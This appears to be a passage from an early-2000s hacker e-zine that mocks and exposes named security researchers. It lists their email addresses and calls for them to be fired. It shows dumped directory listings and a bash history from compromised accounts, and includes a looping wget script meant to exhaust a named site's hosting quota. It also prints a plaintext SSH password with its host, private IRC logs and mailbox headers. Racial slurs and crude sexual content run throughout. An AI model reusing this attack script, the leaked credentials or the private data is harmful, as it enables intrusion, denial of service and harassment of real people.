root wheel 7900 syndrop.c -rwxr-xr-x 1 root wheel 5086 t -rw-r--r-- 1 root wheel 6360 t-shirt-4.0.tar.gz -rw-r--r-- 1 root wheel 2123 t3.c -rw-r--r-- 1 root wheel 2843 tao.c -rw-r--r-- 1 root wheel 34692 targa.c -rwxr-xr-x 1 root wheel 4351 test -rw-r--r-- 1 root wheel 303 test.c -rw------- 1 
root wheel 282624 test.core -rwxr-xr-x 1 root wheel 12267 test_sol_login -rw-r--r-- 1 root wheel 13357 test_sol_login.c -rwxr-xr-x 1 root wheel 5875 testsc -rw-r--r-- 1 root wheel 864 testsc.c -rwxr-xr-x 1 root wheel 8322 testsh -rw-r--r-- 1 root wheel 120 testsh.c -rwxr-xr-x 1 root wheel 4579 teststat -rw-r--r-- 1 root wheel 231 teststat.c -rw-r--r-- 1 root wheel 68401 thc-uht1.tgz -rw-r--r-- 1 root wheel 11936 udpd -rw-r--r-- 1 root wheel 3330 udpsh.tar.gz drwxr-xr-x 2 root wheel 512 udpshell -rw-r--r-- 1 root wheel 1124 w00p drwxr-xr-x 3 root wheel 512 work -rwxr-xr-x 1 root wheel 13720 x2 drwxr-xr-x 7 root wheel 1024 xpdf-1.00 -rw-r--r-- 1 root wheel 397750 xpdf-1.00.tar.gz -rw------- 1 root wheel 839680 xterm.core drwxr-xr-x 2 root wheel 512 zap3 -rw-r--r-- 1 root wheel 3176 zap3.tar.gz I can't help but notice but what is that kr.hosts file? And + bz.hosts? those are lp's, f0r wh3n i h4ck shit i use udpshell on everything i own Looks like you are a fan of gera (a w00w00 patriot) and his + advanced buffer overflow challenges. i've mastered all of them! sparc_login.c is my solaris login exploit i hack .gov's and .edu's with it well me and jduck i hacked the entire internet with my dtspcd and jobe's solaris login + exploit. $ ls -al ~j drwxr-xr-x 11 j j 2048 . drwxr-xr-x 23 root wheel 512 .. 
-rw-r--r-- 1 root jduck 1735738 .pw.pu drwx------ 2 j j 512 .ssh -rw-r--r-- 1 j j 171542 2k.more -rw-r--r-- 1 j j 22605 600.more drwxr-xr-x 2 root wheel 1024 ADMmutate-0.8.4 -rw-r--r-- 1 j j 29108 ADMmutate-0.8.4.tar.gz drwx------ 2 root wheel 512 ASMCODES-1.0.2 -rw-r--r-- 1 j j 2526 ChangeLog drwxr-xr-x 2 1852 25 512 ILINXR.install -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r00 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r01 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r02 -rw-r--r-- 1 root j 15000000 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r03 -rw-r--r-- 1 root j 319488 Patriots.VS.Steelers.AFC.Chapionship.DiVX.CD1.001.r04 -rw-r--r-- 1 j j 469 README.513 -rw-r--r-- 1 j j 8250103 VSC513.tar.Z -rw-r--r-- 1 j j 7069 VSCR513.ps.Z -rw-r--r-- 1 j j 103743 VSCU513.ps.Z -rw-r--r-- 1 j j 14101 asmcodes-1.0.2.tar.gz -rw------- 1 root j 32333 b00 -rw-r--r-- 1 j j 7192 b1nd -rw-r--r-- 1 j j 18436 bb drwxr-xr-x 5 root wheel 1024 binutils-020210 -rw-r--r-- 1 root wheel 57057280 binutils.tar -rwxr-x--- 1 j j 851 cisco-tools -rw-r--r-- 1 j j 243312 core -rw-r--r-- 1 j j 1262996 dbx-sparc.gz -rwxr-xr-x 1 root j 14012 discover -rw-r--r-- 1 j j 3424 discover.c -rw-r--r-- 1 root jduck 84967 edu.tld -rwxr-xr-x 1 root j 6018 er -rw-r--r-- 1 root j 3574 errors drwx------ 18 220 1002 1024 gcc-teso -rw-r--r-- 1 root j 14270640 gcc-teso.tar.gz -rw-r--r-- 1 j j 9801816 gdb -rwxr-xr-x 1 j j 334 get_pg.pl -rw-r--r-- 1 root j 19214 hello -rw-r--r-- 1 root j 83 hello.c -rw-r--r-- 1 root j 864 hello.o -rw-r--r-- 1 j j 1489931 includes.tar.gz -rw-r--r-- 1 j j 2285137 jobe.wl -rw-r--r-- 1 j j 24292 kcms_configure -rw------- 1 root j 1028096 ld.core -rw-r--r-- 1 root j 6036 ld.help -rw-r--r-- 1 root wheel 6144813 linux-ar-405.tar.gz -rwxr-xr-x 1 j j 29292 login -rw-r--r-- 1 j j 1607 login.c -rwxr-xr-x 1 root j 10099 loginex -rw-r--r-- 1 j j 7871 loginex.c -rw-r--r-- 1 j j 10344 m00 
-rw-r--r-- 1 j j 75867384 ogls -rw------- 1 j j 7918 pcnfsd-priv.tar.gz drwxr-xr-x 2 root wheel 512 pcnfsd_remote -rw-r--r-- 1 root jduck 66 pos.vuln.nets drwxr-xr-x 2 root wheel 1024 qcrack-1.02 -rw-r--r-- 1 j j 1489778 sol7-includes.tar.gz -r--r----- 1 j j 125208178 solaris-2.5.1+wings+ow.tar.gzd -rwxr-xr-x 12 root wheel 512 src -rw-r-xr-x 1 j j 229180 sshd -rw-r--r-- 1 root j 45 stuff -rwxr-xr-x 1 root j 4698 test_ws -rw-r--r-- 1 root j 182 test_ws.c -rw-r--r-- 1 root j 3330 udpsh.tar.gz -rw-r--r-- 1 j j 10344 uf -rw-r--r-- 1 j j 7028 uf.c -rw-r--r-- 1 j j 9684 uf2 -rw-r--r-- 1 j j 9956 w00f -rw-r--r-- 1 root j 2219 w00f.c -rw-r--r-- 1 root j 44802 w00pe -rw-r--r-- 1 root j 48755 w00pe2 -rw-r--r-- 1 j j 2272606 w00t -rwxr-xr-x 1 j j 3568 wuftpfmt.pl -rw-r--r-- 1 j j 9084 z2 -rw-r--r-- 1 root j 6458 z3.c -rw-r--r-- 1 root j 8276 z3.o -rw-r--r-- 1 root j 13793 z3.s w00t are all dtspcd hosts that i scanned out fresh for hacking .pw.uu is my sniff log that i keep hidden and Patriots.Vs.Steelers is really illegal porn Absolutely amazing. # rm -rf / # * >seifried #core02 wonders what chium forgot to p[atch :| patch what? he must've sniffed my passwords you use cleartyext passwords? erk no i might have used a trojanned ssh client somewhere sux to be you how'd he get the root password for su though he/she/it no idea looking now SignOff chiun: #cdc,#core02,#phrack,#teen (Ping Timeout: 400 Seconds) .~e~----------------------------------------------------------~e~. ; *11* phrack staff demystified -- ThE UNiX TeRRoRiZt ; `----------------------------------------------------------------' ThE UNiX TeRRoRiZt brings you "PHRACK STAFF DEMYSTIFIED!": ---------------------------------------------------------- krahmer@cs.uni-potsdam.de <-- SuSe fire this guy! edi@ganymed.org tmogg@zigzag.pl paul@boehm.org crontab@netway.at palmers@segfault.net lorian@hert.org caddis@hackforthedole.au.com <-- ISS fire this guy! 
gaius@hert.org scut@nb.in-berlin.de hendy@teso.scene.at <-- I use your utmp cloaker! just@segfault.net halvar@gmx.de <-- Know Your Enemy! zip@james.kalifornia.com <-- ISS fire this guy! lists@immutec.com acpizer@unseen.org skyper@segfault.net <-- Hacks from segfault! gamma@segfault.net kil3r@hert.org route@infonexus.com <-- Wrote a stupid book! ThE UNiX TeRRoRiZt brings you "BONUS COVERAGE OF SKYPER HACKING!": ------------------------------------------------------------------ # cat ~skyper/.bash_history ssh www.cnn.com set echo $RESOLV_HOST_CONF ls tar xfvz ADMglibcsh.tar.gz strings resolv/res_hconf.c ./ADMglibcsh ls -al /tmp/.sh rm /tmp/.sh ls exit top su la-. lhendy wow echo "dfusLL#d" >doze.pwd ls -al doze.pwd chmod go-r doze.pwd nc -l -p 1024 whereis nc netcat which nc which netcat netstat -ant nc -l -p 31339 >ircs_coredump_cert.pem unset HISTFILE exit .~e~----------------------------------------------------------~e~. ; *12* gobble blaster -- uncle m4v1s ; `----------------------------------------------------------------' #!/bin/sh # own-gobbles # by uncle m4v1s # # th1z skr1pt takez 4dv4ntag3 0f a kn0wn d0s 0n a gr0up # 0f sekur1ty whiteh@ l4m3rz kn0wn as G0BBLEZ # 3ver s1nce th31r l4m4ss st0rmh0st1ng pr0v1d3r wuz 0wned # & fear1ng 4 th31r l1v3z th@ ADM wuz g01ng 2 k1ll th3m # r0n1n struck up a d34l w/ a fr33 h0st3r. # pr0blem 1z th0 they h4v3 qu0taz. # run th1z, h3lp d0 ur part 2 erad1k8 l4m3rz!!!!!! HTTP_DOMAIN=http://www.bugtraq.org CMD_LYNX=lynx CMD_WGET=wget SITE_RESPONSE=1 DUMP_PATH=/tmp/GOBBLES echo uncle m4v1s gonna buzt s0me headz echo remember 2 add th1z skr1pt 2 ur m0nthly kr0nj0b rm -rf $DUMP_PATH $CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null SITE_RESPONSE=$? while [ $SITE_RESPONSE -eq 1 ] ; do echo sod0m1zing GOBBLES w/ a retr4kt4bl3 b4t0n ... mkdir $DUMP_PATH cd $DUMP_PATH $CMD_WGET -r http://www.bugtraq.org $CMD_LYNX --dump http://www.bugtraq.org | grep exceeded > /dev/null 2>/dev/null SITE_RESPONSE=$? 
done rm -rf $DUMP_PATH echo THE MONTH OF THE TURKEY HAS ENDED .~e~----------------------------------------------------------~e~. ; *13* ~e~ 1nterv1ew with te4m OG -- uncle m4v1s ; `----------------------------------------------------------------' 1nterv1ew with te4m OG by uncle m4v1s -------------- m4v1s: y* ben-z: n1gg4 sh1t u kn0w wh4t-1m-sayn, sh1t sh1t... h0ld up lemme hit th4 b0ng 1 m0re tym3 d4wg m4v1s: 0k [appr0xim8ly 15 minutez elapse] [the s0und 0f c0ughing 1n the backgr0und] m4v1s: u 0k br0? ben-z: sh1t, juzt blazn s0me weed u kn0w wh4t-1m-sayn, my b0y dap[gH] iz 0ver u kn0w wh4t-1m-sayn, l3mm3 get an0ther huff be4 th1z fewl10 burnz all my kr0n1k m4v1s: 0k ben-z: ur n0t lyke the m4v1s that teach3z typ1ng r1ght? m4v1s: n0 m0thafuq4 th@z y0ur ugly bl4q m0m... th1z 1nterv1ew 1znt ab0ut me anyh0w h0lm3z m4v1s: u re4dy 2 beg1n d4wg? ben-z: y4 u kn0w wh4t-1m-sayn 1t s33mz l1ke every tyme 1 get 0n 1rc th1z h0 wr4pz her b1g f@ bl4ck l1pz ar0und my c0ck & w0nt l3t g0 u kn0w wh4t-1m-sayn lol ;> m4v1s: 0h, ok ben-z: b3n 2 tha m0th3rfuckin Z BI0t[H m4v1s: y4 w0rd n1gg4-4-re4l ben-z: yiz0 m4v1s: 0k, br0 1 g0t a l0ng l1zt 0f pe0ple 1 n33d 2 retr13v3 sn1ffl0gz fr0m & 1 a1nt g0t n0 sh3llskr1pt 4 1t y3t... s0 if u r try1ng 2 w4st3 my t1m3 1 th1nk 1m g0nn4 g0 ben-z: 0k s0rry m4v1s g0 ah34d m4v1s: k s0... wh0 st4rt3d te4m 0g?? ben-z: s0 u kn0w 1tz like we uz3d 2 be gH, th4 gl0bal h3ll, th3n my b01z m0st8d & m1ndphazr g0t r41d3d.. 1t wuz w31rd y0 cuz lyke me & m0sth8d w0uld alw4yz B t4lkn 0n 1rc n sh1t, u kn0w wh4t-1m-sayn, kuz 1 wuz 0nly 12 @ the t1me, 1 n3v3r h1t n.e. 0f th@ puzzy u kn0w wh4t-1m-sayn, m0st8d, he wuz k1nda l1ke my ment0r 0nl1ne 4 g1rlz.. sh333333333333t we uz3d 2 m4k3 j3nn1c1d3 kum lyke 5 tymez 4n h0ur 0n th4 c0nf.... 
he uz3d 2 t4lk l1ke he wuz z0rr0 & i wuz h1z truzty s1dek1q R0Dr1g0, u kn0w wh4t-1m-sayn, but th@ wuz 4g3z 4g0 ben-z: anyh0w s0 we g0t th1z 1d34, kuz l1ke h4lf 0f us w3r3nt 3v3n 1n j41l aft3r the gH r41dz, u kn0w wh4t-1m-sayn, cuz lyke we wuznt even 0ld enuff 2 get t1me in juv1e s0 we dec1ded 2 st4rt a sekur1ty kr3w & see 1f we k0uld h1t 1t up b1g... && m4ybe m4k3 s0me pes0z... we f1gur3d 1f we g0t enuf kust0m3rz we k0uld buy hack.c0.za fr0m g0vernmentb01 4fter 1t g0t shut d0wn, & mayb3 3v3n h4v3 enuf $$$$$$ [gr33n] 2 g3t 4 p4tch 4 the AIDZqu1lt w1th m0st8d's n1ck & 4 skreensh0t 0f the wh1teh0use def4c3m3nt. m4v1s: 1nterest1ng... s0 1 he4r u r quite the 4sm k0d3r n0w... ben-z: ya br0... g0tta le4rn th@ sh1t, 1tz t1ght y0.... 3v3r s1nce me & my b01 m0sth8d repl4c3d th3 sh3llk0d3 1n r0tshb.c, 1tz b33n l1ke a gr1pp1ng f4sc1n4t10n 4 m3... u kn0w wh4t-1m-sayn, g0tt4 get the k0d3 4 th4 BQ, y0 n1gg4z b k0ll3ktn s0me l00t, ben-z B p0pn sum r00t, quick'n sl1de up & d0wn /var/l-0-g, be sure 2 rem0ve th3 h0stname 0f any re4l 0g, burn'n s0me k4$h, wgetting ad0re in2 tha /var/cache, s1tt1n 1ns1d3 sm0kn sum cr4q fr0m my c0ke c4n, 0verfl0win y0ur staq gett1n r00t by f00lin sgid m4n, y3h we b4ckd00rd b1tchx, s0 m0thrfuqr WH4TZ n3xt??????/ m4v1s: heh... th4t wuz pr3tty t1ght br0 ben-z: y4 1 g0 4ll sp0nt4ne0uz w/my fre4ky-phr33-phl0... s0meth1n th@ b4nsh33 taught me 4 wh1le baq 0n r00tab3ga... 1 k4nt b st0pd, u kn0w wh4t-1m-sayn, lyke a nucl34r p0wer pl4nt, BEN 2 th4 m0therfuqn Z. m4v1s: 0k d()g k4n u plz ch1ll... 
ben-z: 0h sh1t itz B3n 2 tha M0THAFUCK1N ZZZZZZZZZZZZ y3z h3r3 1 c0m3, h0pn 0n y0ur sw1tch, hustl1n u 0uta sp0rtzk4rz w1th m0re f1n3ss3 th4n k3v1n p0uls3n u n1gg4z be h8in on my 4g3 but th@z 0k kuz u kn0w 1 fuqd m4ryk4t3 & ashl3y 0ls0n qu1ck 2 th3 dr0p, wh3n u see me j01n y0ur ch4nn3l 0n 1rc u kn0w 1m pakn th4 9 try k0mp1l1ng msk4n & ch3ck1n 4 s0l4r1s b0x3z 1n k0r34 & n0w u kn0w u just kr0ss3d th4 phuckn l1n3 1 w4lk in k0ur4ge0us fuq the p0lym0rph1k sh3llk0d3, 1 d0nt k4r3 1f ur run'n sn0rt 1 g0t 5 b1tch3z h1tn me up 4 breazt 1mpl4ntz be4 1 even get th1nking 4b0ut th3 fukn ch1ld supp0rt m4v1s: w8 up.. i ben-z: BEN 2 THA M0THAFUCKINZ m0thrfuqr u kn0w-wh4t-1m-sayn.. m4v1s: n0 B1TCH U l1sten 2 me, m0re l1ke b3n-2-tha-m0thafukn-G lyke benji, u fukn w4nn4be l1l-b0w-w0w m0thrfuqr fuk u bitch 1ve h4d enuf 0f y0ur sh1t t1m3 2 dump y0ur w4r3z and f1n4lz3 th1z ~el8 styleeeeeeeee ........ ben-z: wtf?????? m4v1s: ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** m4v1s@~el8:/0wned/og# cat trivia.txt Who wrote the first Linux kernel? : Linus Torvalds What register points to the beginning of the stack in x86? : esp Which direction does the stack grow in x86? : down When a processor is said to be 8,16,32,64 bit etc, what bus is that number refering to? : data bus How much memory is allocated for a char on a 32 bit processor? : 4 bytes What does pgp stand for? : Pretty Good Protection What is the highest bit key you can create with pgp? : 4096 bits Who invented hexadecimal? : IBM Hoe many bits in a byte? : 8 The x11 server runs on which port? : 6000 Is it morally and ethically right to eat animals? : NO*no*FUCK MEAT EATERS*nope*naw what is the size of a tcp header in bytes? : 20 what is the size of a ip header in bytes? : 20 what type is NULL defined as? : void pointer what is the site of a integer in bytes? : 4 What header file contains (struct sockaddr_in) : /usr/include/netinet/in.h what is the most common localnet subnet ? 
: 192.168 list the 2 required layers of network transfers. : Link Layer, IP Protocol what is the \"main\" initialization structure for WinAPI? : WinMain() What does ARP stand for? : Address Resolution Protocol What is the hax0r drink of choice? : pepsi What will gH never do? : die What does Spanning Tree Protocol Prevent? : Network Loops Which Cisco IOS command displays the current software version? : show version What baud rate do Cisco console ports operate at? : 9600 ATM (network protocol) stands for what? : Asynchronous Transfer Mode Traceroute uses ICMP and what protocol? : udp What is the Cisco Catalyst Operating System commonly known as? : CatOS What does ACL stand for? : Access List OC-3\'s use what technology for a medium? : fiber DS-3\'s use what for a medium? : Copper how big is my cock : as big as a broken crayola how big is my dick? : 11 inches around m4v1s@~el8:/0wned/og# lynx sysctl.html Date: Tue Apr 30 20:57:52 CDT 2002 From: ben-z To: YOU! Subject: Neat IP Options in FreeBSD-4.4+ Just thought I'd pass along a few neat freebsd tricks I learned today: sysctl net.inet.udp.blackhole=1 - the boxen will not respond with an RST when it receives a UDP packet on a closed port sysctl net.inet.udp.blackhole=2 - the boxen does nothing when a UDP packet is received for a closed port or sysctl net.inet.tcp.blackhole=1 or =2 - same as above, but for TCP The following lines can also be added to /etc/rc.conf for extra security: tcp_drop_synfin="YES" -- the boxen will drop tcp packets with both the SYN+FIN flags set (prevents OS fingerprinting) log_in_vain="YES" -- connections to ports that have no listening socket will be logged tcp_restrict_rst="YES" -- the kernel will no longer respond with an RST for invalid tcp packets icmp_drop_redirect="YES" - the kernel will ignore ICMP_REDIRECT messages Enjoy, ben-z ben@ohgee.org "The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged
material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from all computers." m4v1s@~el8:/0wned/og# cat strcpy.txt bash-2.05# cat test.c int main(int argc, char *argv[]) { char buf[100]; strcpy(buf,argv[1]); return 0; } bash-2.05# su - ben su-2.05$ cat strcpy.c char *strcpy(char *dst,char *src) { system("/bin/sh"); return 0; } su-2.05$ gcc -c -static strcpy.c strcpy.c:1: warning: conflicting types for built-in function `strcpy' su-2.05$ ld -shared -o strcpy.so strcpy.o su-2.05$ LD_PRELOAD="/home/ben/strcpy.so" ; export LD_PRELOAD su-2.05$ ./test $ id uid=1000(ben) gid=1000(ben) groups=1000(ben), 0(wheel) m4v1s@~el8:/0wned/og/members/jaynus/code/asm# cat print.s .section .data string_to_print: .ascii "hahahah owned\n" .text .global _start _start: movl $4, %eax movl $1, %ebx movl $string_to_print, %ecx movl $14, %edx int $0x80 movl $1, %eax xorl %ebx, %ebx int $0x80 m4v1s@~el8:/0wned/og/members/jaynus/code# head -n 20 cfg-parse.c |less /* Example high level config parsing */ #include #define SHIT 1 #define POO 2 #define FUCK 3 struct cfg { char *shit; char *poo; char *fuck; }; int main(int argc, char *argv[]) { FILE *fd; struct cfg *in; char buff[255], *cmd; m4v1s@~el8:/0wned/og/files/music# ls ben-z-illumination_beyond.mp3* index.php.save* ben-z-story_to_tell.mp3* shekk-just_another_day-part2.mp3* ben-z_feat_gamble-illusions_freestyle.mp3* shekk-luck_is_your_only_god.mp3* ben-z_feat_gamble-reflections_freestyle.mp3* shekk-top_of_dee_world.mp3* index.html* shekk-wakin_up_bluez.mp3* index.php* m4v1s@~el8:/0wned/og/files/music# cd ../../ m4v1s@~el8:/0wned/og# cat ANNOUNCEMENT-040202.txt OHGEE: After playing around with our new domains, teamog.org and ohgee.org, I thought of a great idea of how to regulate vhosts and email addresses! 
The problem is this: the domains arent hosted on my box and theres nothing i can do about that. i simply cant give _everyone_ who idles in the channel a bnc and email address. However, i can provide tons of email addresses and a few bncs. SOOOOOO, the way I'm thinking would be most appropriate for dividing up who gets what, is to make this offer: * The first _WORTHWHILE_ package/code/text you submit to be posted on the site, you will recieve an @ohgee.org or an @teamog.org email forward or pop3 account. your choice. * The second (see above) you submit, i will do everything i can to hook you up with ONE bnc to connect to efnet. A few people may have to share an ident due to the background process restrictions, but fuck man its still a r33t bounce =] *** The only other way you can get a teamog.org/ohgee.org subdomain is if you have a LEGIT root boxen that you control the reverse dns for, AND we must ensure that only og members can access that IP. i.e. ipfw must be setup to restrict that IP from every user but you. if you guys absolutely hate this idea let me know, but jaynus and i are the only ones who paid money for this shit, so eat a cock =] sincerely, ben to the motherfucking z, BITCH. ben@teamog.org m4v1s@~el8:/0wned/og# m4v1s@~el8:/0wned/og/ioho/one# ls alfred.pl* cockblaster.irc* fawx3.c* ioho1.jpg* og-brute101.tgz* strscan2b1.c* angst.txt* collegehowto.txt* index.html* kevorkian.txt* quotes.txt* tyrone1.tgz* bacotell.txt* dbsnatch1.tgz* ioho-5-2001.tgz* mrps-v01.c* rvscan-v4.tgz* m4v1s@~el8:/0wned/og/ioho/one# head *.pl *.txt *.irc *.c|less ==> alfred.pl <== #!/usr/bin/perl -w # # example ddos server for non-root shells using perl sockets.. # listening port disuises itself as an eggdrop irc bot. # # crafted by: heeb (heeb@phayze.com) [#og @ irc.ndrsnet.com] # # version 0.1 (2/19/2001): # very slow.. needs a whole lot of work to make it worth using. 
# includes ident request flood, http GET / flood, smtp HELO flood, ==> angst.txt <== so here i am, 18 years old and lost. 18 years old and prescribed to prozac. 18 years old and 2 times a dropout. is it wrong of me to not want to go to college? is it wrong of me to think maybe theres something more out there for me than 4 more years of fucking school? i never pictured myself working a normal 9 to 5. i mean i love computers technology in general, but i still dont want to be sitting in a fucking cubicle coding my whole life. i always wanted to be something more than that. i just want to be remembered for something. i want to be more than just another rat in the race. but i dont know if i have it in me to be something special. maybe im destined to be ==> bacotell.txt <== [og] hacking "baco tell" for fun and profit. *wink* *wink*, *nudge* *nudge* Step 1: order something that normally comes with tomatoes and has the "red sauce" in it (i.e. a pexican mizza). specifically ask for "no tomatoes". make sure to keep your reciept. Step 2: since the magic red sauce that they use has tomatoes in it, you will get tomatoes. eat almost all of your food, but save a piece of it that has a ==> collegehowto.txt <== how to fail out of college by the ph4rcyd3 you may be thinking to yourself, "sheeeet, how hard could it be to fail out of college?" but believe me, its a lot harder than you think. step 1: have yourself a really laid back senior year. i mean, get into college and everything first. make sure its really far away too. you dont wanna be stuck in your shit town forever. then, get high before classes, skip school, sleep all day. come on! its your god given right as a senior to fuck up. go the to prom with a hot ass chick, get her all drunk and fuck the shit out of her afterwards. then at graduation, dont wear a god damn thing under your gown, and when you get your diploma, give your entire class a fruit bowl. 
==> kevorkian.txt <== the kevorkian by halcy0n the kevorkian bong was introduced to me a few weeks ago by a friend of mine named bob. bob, being a pretty big pothead, had all sorts of k-neeto smoking devices in his room. one of which, was a little contraption he called the kevorkian. after 2 good hits off this mofo i was toeeeeeeeee up. so, you want one? well heres how you make em. materials needed ==> quotes.txt <== all i was doing was nukeing I'm not a playa, i just crutch alot I'm an expert on computer physics and how they work and what happens when u do this or that.. I only started nukes yesterday.. I'm a novice.. I can crash your harddirve [BeloZer0(warez@okcnasz-21.ionet.net)] i actually run Win98 and Linux dipship !DuCkTaPe!*! [forfeit(teet@hey.laserlips.your.mother.was.a.snowblower)] JOHNNY FIVE IS ALIVE@#%! i gotz a bad case of carpool tunnel syndrome! isnt it fun to rap freestyle while taking a dump i thought it was some semi leet hax cult. and figured since i was a new member. i would show off my power fuck me gently with a chainsaw and call me mother threasa ==> cockblaster.irc <== # # [og] cockblaster.irc, makes up a whole lot of random insults. # compiled by #og @ irc.ndrsnet.com for good wholesome family fun! # @cb=[^B!^Bcb^B!^B] @one.0=[johnson] @one.1=[cock] @one.2=[dyke] @one.3=[clitoris] ==> fawx3.c <== /* [og] fawx3.c, sends every type of icmp/igmp type+code to * -- heeb (heeb@phayze.com), #og @ irc.ndrsnet.com */ #include #include #include #include #include #include #include ==> mrps-v01.c <== /* * [ Mass RPC Program Scanner v.01 ] * <( IOHO - 2001 )> * * quick, simple rpc scanner. scans a class a/b/c, list, single ip for * running rpc programs. upcoming versions will utilize multiple sockets * for speed, specific rpc id searching, and small os fingerprinting. * look for further versions. 
* * thanks: robosok for debugging help ==> strscan2b1.c <== /* ( IOHO 2001 #og irc.ndrsnet.com ) */ /* strscan.c v2b1 by ka0z@ndrsnet for IOHO E-Zine http://chickenz.net/og */ /* Basically, I made this for myself and it was suggested that I put */ /* this in the e-zine so I did. Any ideas on how to implement the */ /* multiple line banner checking would be greatly appreciated. */ /* this has been optimized with ntohl and htonl and shit like that blah */ /* blah blah blah.....ok */ #include m4v1s@~el8:/0wned/og/0day# ls 0x3a0x29snmp.c bacotell.txt htwatch-1.1.tgz pr0nhoar.sh trinscan-v1.0b2.tgz 2600-cable_uncap.txt blades.txt idq5.c quotes.txt tyrone1.tgz 73501867.c bsdtelnetd.c kevorkian.txt rvscan-v4.8.tgz x2 7350854.c cockblaster.irc mnemninja/ rvscan-v4.tgz x2.tgz 7350bind9-39273.c collegehowto.txt mrps-v01.c shells-v1.tgz x2src.tar.gz 7350cfsd.tgz dbsnatch1.tgz muhaha.tgz shellsv1.tgz x3.tgz 7350squish.c delegate6x.c netkit-telnetd.c slogin-sexter.c x4.tar 7350telnet.c dtspcx.c og-brute101.tgz solftpd.c x5.tgz 7350wurm.c eggkill.irc og-snmp.c solsafe-0.1.tgz xaim.sh alfred.pl fawx3.c ogfw1.tgz strscan2b1.c xgdb.pl angst.txt fuckm.sh osshchans-1.3.tgz targets asp5.c hhp-netd.tgz pass targets.dat m4v1s@~el8:/0wned/og/0day# ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** ~el8 ***** END STRAT3G1k 0DAY DUMP .~e~----------------------------------------------------------~e~. 
; *14* lyfestylez of the owned and lamest with aempirei -- b_ ; `----------------------------------------------------------------' hello this is b_ as you all know i hate aempirei's g*tz i will show you around his account on gravitino aempirei you are a pussy and i'll kick your fucking ass btw i fucked your fiance $ ssh -l aempirei gravitino.net aempirei@gravitino.net's password: BoW-is-leet $ ls -a ./ IrcLog naim* ../ Mail/ naim.core .BitchX/ SearsMCBill naim.log .addressbook Stereotype.tar.gz newfile .addressbook.lu The Society of Strings.doc ngram-talker.tar.gz .bash_history ainow.doc pics/ .bitchxrc ainow.prn public_html/ .cshrc ambient_idm.mp3 q/ .cyp.fsave bscan.cpp r3sum3.doc .faimrc byz-io.ps readme .history data_me reals.doc .indent.pro e.gz reals.prn .irlrc elite resume.txt .login end-fs.doc scanner.tar.gz .lynx_cookies fofo shit.txt .mailrc irftpdx.c stream_idm .pine-debug1 iwt/ tars/ .pine-debug2 iwt.tar.gz uip-0.6.tar.gz .pine-debug3 kengstrom.doc webcrawl/ .pinerc logo.gz webcrawl.tgz .profile mail/ wuexploit/ .ssh/ mbox wux86_glob.c .tcshrc misccode/ x2-devel/ AIMDump.c moreCA.tar.gz zip-ssh* as you can fucking see we not only kicked your ass, we own your + dumb ass $ head AIMDump.c /* AMBIENT EMPIRE */ #include #include #include #include #include #include #include we have all your 0day qualys warez $ less -R IrcLog [msg(aempirei)] well if you think you are then letz go to the doctor [aempirei(aempirei@gravitino.net)] good idea [aempirei(aempirei@gravitino.net)] thats what i want to do [msg(aempirei)] okie [aempirei(aempirei@gravitino.net)] its just i've had this burning sensation [msg(aempirei)] me too [aempirei(aempirei@gravitino.net)] we should get checked that is all [msg(aempirei)] honey, i agree we have all your private irc convos $ ls iwt 3net fullscan* logo-large report-livescan.c 768scan.c home/ logo-med report-tracemap.c 768scan.conf icons/ makepic* report3d-tracemap.c MD5 ifret.c mkips* scan-main.c Makefile include/ myfont.c sysfuncs.c 
README ipv4.c osident-main.c tcpscan.c dnslookup* legend.php* osident.c tcpscan.conf draw-topology.c lib/ osprints.conf tracemap.c drawer.php* livescan.c packets.c fasttrig.c livescan.conf php/ look, more qualys-warez $ cat mbox > From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] > From: research@camisade.com [mailto:research@camisade.com] > To: '&' > To: BUGTRAQ@SECURITYFOCUS.COM > To: Olivier Devaux > To: Ralph Logan > To: aempirei@gravitino.net > To: oliv@qualys.com > To: radix@camisade.com > To: rlogan@camisade.com; jw@mksecure.com > To: team-radix@camisade.com Delivered-To: ani-abettini@camisade.com Delivered-To: ani-all@camisade.com Delivered-To: ani-cabad@camisade.com Delivered-To: ani-cts-radix@camisade.com Delivered-To: ani-info@camisade.com Delivered-To: ani-radix@camisade.com Delivered-To: ani-research@camisade.com Delivered-To: ani-rlogan@camisade.com Delivered-To: ani-team-radix@camisade.com Delivered-To: ani@hert.org Delivered-To: eugene@localhost.securityarchitects.com Delivered-To: kendra@blandest.org Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: mailing list pen-test@securityfocus.com From: "Adam O'Donnell" From: "Ambient Empire" From: "Ben Weber" From: "Chad Pringle" From: "Customer Support" From: "DICE" From: "David Litchfield" From: "David Rhodus" From: "Dee and Galen Engstrom" From: "Edg Duveyoung" From: "Home2" From: "InvestBio_Report@aol.com" From: "Jay Doscher" From: "Kathleen Koepp" From: "Kendra Engstrom" From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] From: aempirei@gravitino.net [mailto:aempirei@gravitino.net] From: ani From: ani@hert.org From: anonymous@segfault.net From: awr From: awr From: awr@gravitino.net From: bidconfirm@ebay.com From: obecian From: pandora From: private static void From: proletariat To: messiah To: pen-test@securityfocus.com To: peter@slagheap.net, barclay@mp3.com, mark@stateful.net, To: proletariat To: radix@camisade.com To: rika@smtp.well.com To: rlogan@camisade.com, 
